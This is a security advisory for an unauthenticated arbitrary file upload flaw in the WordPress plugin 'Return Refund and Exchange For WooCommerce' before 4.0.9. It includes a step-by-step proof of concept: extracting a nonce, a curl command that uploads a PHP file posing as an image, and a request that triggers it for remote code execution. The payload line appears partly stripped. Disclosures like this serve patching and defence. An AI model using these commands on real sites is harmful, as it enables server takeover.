Return Refund and Exchange For WooCommerce < 4.0.9 - Unauthenticated Arbitrary File Upload

The plugin does not validate attachment files to be uploaded via an AJAX action available to unauthenticated users, which could allow them to upload arbitrary files such as PHP and lead to RCE

PoC

1. Install and activate woocommerce (dependency, no setup required) 2. Install and activate the vulnerable plugin 3. As an unauthenticated user, navigate to the “Cart” page at /cart/ (this page should exist because of woocommerce) 4. Extract the plugin’s nonce from the page source (CTRL+F for “wps_rma_nonce”) 5. Prepare a payload: echo ‘’ > /tmp/payload.php 6. Invoke the following curl command, with the previously extracted nonce, to upload the payload: curl -i ‘https://example.com/wp-admin/admin-ajax.php?action=wps_rma_return_upload_files&amp;security;_check=’ \ -F ‘wps_rma_return_request_order=prefix’ \ -F ‘wps_rma_return_request_files[]=@/tmp/payload.php;type=image/jpeg’ 7. Trigger the payload, it should have been uploaded to /wp-content/attachment/-: curl https://example.com/wp-content/attachment/prefix-payload.php